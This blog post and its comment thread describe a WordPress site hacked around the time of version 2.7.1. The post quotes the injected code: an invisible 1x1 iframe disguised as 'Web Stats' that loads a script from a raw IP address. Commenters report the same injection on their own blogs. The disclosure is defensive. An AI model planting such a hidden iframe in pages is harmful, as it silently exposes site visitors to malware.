screen-capture

You know your getting noticed when you get hacked! WP Crack?

This morning at about 8AM my fellow tiny house blogger, Kent Griswold, let me know that this site was creating a security alert in Safari. The alert said that my site contained Malware. Immediately I started digging and within 20 minutes had figured it out. I’m not sure how it was done but a little tiny bit of code was stuck into one of my posts. Here is the code. Don’t worry it’s disabled but I would not recommend visiting that website.

<!– Web Stats –> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!– End Web Stats –>

It was only partly visible in html view, the iframe wouldn’t render so it looked virtually invisible. I changed my password, locked down my comments, and tightened up security. I suspect there may be a security hole in the current version of WordPress, but who knows it could have been some plug-in I was testing too.

I’m going to spend a little time later tonight changing passwords on all my blogs and doing what I can to protect myself. If you run blogs I suggest you try doing some searches for Malware too.

Lucky for me they picked my least busy blog, this one, my personal blog. It would seriously suck if my top blogs popped up warning screens like this one to all my visitors. Fricken hacker bastages!

screen-capture

  1. Oh, that sucks, Michael. I’m sorry. Glad it sounds like Kent caught it pretty quickly.

    Any recommendations on how to try to prevent something like that from happening?

  2. Michael Janzen

    I’m still puzzled about how they did it. To update a record in the db they would need publishing access. That means they would have the password, but there was no other evidence of intrusion, which leaves plug-in infiltration, an unknown WP vulnerability, or that I pasted it in myself through a copy/paste.

    Since all those options also seem unlikely I simply changes passwords everywhere and did a search of my databases for the malware code No other instances showed up. I’m going to be very careful in the future about trying new plug-ins. I’m also going to keeps tabs by checking with Safari.

    If it is a crack in WP security I bet they are working on a fix. WP is great software and the team behind it seems to do a great job thwarting bad guys.

  3. Just had the same thing happen on one of my blogs. WP 2.7.1, exact same code as you. It’s gotta be a WP hole, but I don’t know…

  4. My blog just got hit by this aswell, I found stuff in two of my posts, removed them now, and changed my password, not sure what else to do. Thanks for posting about it though, not much out there on this hack.

    • Michael Janzen

      Thanks Chris. It’s still a mystery to me too. Luckily I’ve detected no more intrusions. Whoever it is they aren’t working too hard at it.

  5. Sarah

    Did anyone find any more about this? I’ve been hit twice in the last month. All my plugins (admitedly a lot of them) + my WordPress is up-to-date + passwords changed but it’s still happened again….

    I think it’s an automated hack as my posts are being changed a minute after they go live but would like to know how they are gaining access to my blog as it should be fairly well locked down!

    • Michael Janzen

      Hi Sarah,

      I have not had any more trouble, that I know of. I don’t know what wordpress is doing to fix. Sorry.

      -Michael

Leave A Comment?